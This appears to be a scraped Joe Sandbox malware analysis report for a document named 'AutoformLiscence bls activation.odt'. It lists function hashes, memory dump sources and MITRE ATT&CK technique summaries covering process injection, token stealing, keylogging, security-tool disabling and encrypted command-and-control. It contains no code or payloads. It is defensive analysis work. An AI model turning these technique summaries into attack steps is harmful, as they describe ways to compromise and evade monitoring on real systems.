Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000010.00000002.611251920.004E0000.00000040.00000001.sdmp, Offset: 004E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_4e0000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82ea0eb6c84e75a1f04463295e67089c8ebe6e75bd652b9c34f296b7a37f3735
Instruction ID: 53c622f0e46944caea7fa1ca3c90de3babdb5990cf767ed4be9c87b2e924a3cf
Opcode Fuzzy Hash: 82ea0eb6c84e75a1f04463295e67089c8ebe6e75bd652b9c34f296b7a37f3735
Instruction Fuzzy Hash: 84F0DF6541EBD01FDB1397351CA65923FB09D1724530E49CBC0C1CE4A7D6185A0DC373

Uniqueness

Uniqueness Score: 0.00%

Function 0147081E, Relevance: .0, Instructions: 27
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000010.00000002.611394921.01470000.00000040.00000040.sdmp, Offset: 01470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1470000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 027477d8b3c23029d864ec05d4559ad366a58fb154ee59bfa1d2aa6a66c75e74
Instruction ID: 49be7bb9860ad21c2e03e7e5fa83c7e62d7a28505bc84e84c8b6ec29cbcc2f71
Opcode Fuzzy Hash: 027477d8b3c23029d864ec05d4559ad366a58fb154ee59bfa1d2aa6a66c75e74
Instruction Fuzzy Hash: 55E09276A047008F9654CF0AEC45462FB98EBC4A30B18C07FEC4D8B710D635B944CAA5

Uniqueness

Uniqueness Score: 0.00%

Function 002323F4, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.610926003.00232000.00000040.00000001.sdmp, Offset: 00232000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_232000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9837bb74e7c8c2cf2126dd1d75173a43e8a511891ef92979e27650755cdbd89
Instruction ID: 6d5262ce363f719e126754bd31c531f6360b59a712d725f5a0296f660e942cf7
Opcode Fuzzy Hash: c9837bb74e7c8c2cf2126dd1d75173a43e8a511891ef92979e27650755cdbd89
Instruction Fuzzy Hash: CCD05B752155918FD3168E1CC154F5577946B51704F4644F9D800DB663C364E995D300

Uniqueness

Uniqueness Score: 0.00%

Function 002323BC, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.610926003.00232000.00000040.00000001.sdmp, Offset: 00232000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_232000_dllhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3f586898e6341fe97e31a0f6cb7ea3ec937dd6550fa11efdd2f6e3aefac435c
Instruction ID: 48a3da5b65cee83a5e27d0e5c515656877802a4082ea1f838901805a36156e31
Opcode Fuzzy Hash: a3f586898e6341fe97e31a0f6cb7ea3ec937dd6550fa11efdd2f6e3aefac435c
Instruction Fuzzy Hash: EDD05E742501828BC719DE0CC194F59B7E4AB80B04F1644EDBC108B666C3B8DDD4C700

Uniqueness

Uniqueness Score: 0.00%

Non-executed Functions

Description:	Windows Management Instrumentation (WMI) is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and PowerShell but could also be in the form of command-line batch scripts.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer.
Tactics:	Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Per Apple’s documentation, startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items . This is technically a deprecated version (superseded by Launch Daemons), and thus the appropriate folder, `/Library/StartupItems` isn’t guaranteed to exist on the system by default, but does appear to exist by default on macOS Sierra. A startup item is a directory whose executable and configuration property list (plist), `StartupParameters.plist` , reside in the top-level directory.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Process monitoring
Platforms:	macOS
Url:	Open detailed description by Mitre

Description:	Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token. For example, Microsoft promotes the use of access tokens as a security best practice. Administrators should log in as a standard user but run their tools with administrator privileges using the built-in access token manipulation command `runas` . Adversaries may use access tokens to operate under a different user or system security context to perform actions and evade detection. An adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. An adversary can use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security scanning or event reporting.
Tactics:	Defense Evasion
Data Sources:	API monitoring, Anti-virus, File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries can use methods of capturing user input for obtaining credentials for Valid Accounts and information Collection that include keylogging and user input field interception.
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Kernel drivers, Process monitoring, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system. This may include things such as local firewall rules, anti-virus, and virtualization. These checks may be built into early-stage remote access tools.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software running on systems within the network.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries will likely attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used.
Tactics:	Discovery
Data Sources:	Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Files may be copied from one system to another to stage adversary tools or other files over the course of an operation. Files may be copied from an external adversary-controlled system through the Command and Control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP . Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control, Lateral Movement
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information from a target.
Tactics:	Collection
Data Sources:	Authentication logs, File monitoring, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report AutoformLiscence bls activation.odt

Overview

General Information

Detection

Confidence

Classification

Analysis Advice

Mitre Att&ck Matrix

Signature Overview

AV Detection:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Remote Access Functionality:

Signature Similarity

Similar Samples

Behavior Graph

Simulations

Behavior and APIs

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Yara Overview

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Screenshots

Thumbnails

Startup

Created / dropped Files

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

Static File Info

General

File Icon

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTPS Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

Function 004CACB7, Relevance: 1.6, APIs: 1, Instructions: 75
COMMON

Function 004CBBDE, Relevance: 1.6, APIs: 1, Instructions: 88
COMMON

Function 004CAF24, Relevance: 1.6, APIs: 1, Instructions: 88
COMMON

Function 004CB01D, Relevance: 1.6, APIs: 1, Instructions: 82
COMMON

Function 004CB114, Relevance: 1.6, APIs: 1, Instructions: 81
COMMON

Function 004CA8B4, Relevance: 1.6, APIs: 1, Instructions: 74
COMMON

Function 004CB1F0, Relevance: 1.6, APIs: 1, Instructions: 72
COMMON

Function 004CBC12, Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Function 004CB04A, Relevance: 1.6, APIs: 1, Instructions: 67
COMMON

Function 004CB97E, Relevance: 1.6, APIs: 1, Instructions: 66
UNIQUE

Description:	Adversaries may collect data stored in the Windows clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Data is encrypted before being exfiltrated in order to hide the information that is being exfiltrated from detection or to make the exfiltration less conspicuous upon inspection by a defender. The encryption is performed by a utility, programming library, or custom algorithm on the data itself and is considered separate from any encryption performed by the command and control or file transfer protocol. Common file archive formats that can encrypt files are RAR and zip.
Tactics:	Exfiltration
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may explicitly employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if necessary secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Use of a standard non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive. Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a common, standardized application layer protocol such as HTTP, HTTPS, SMTP, or DNS to avoid detection by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre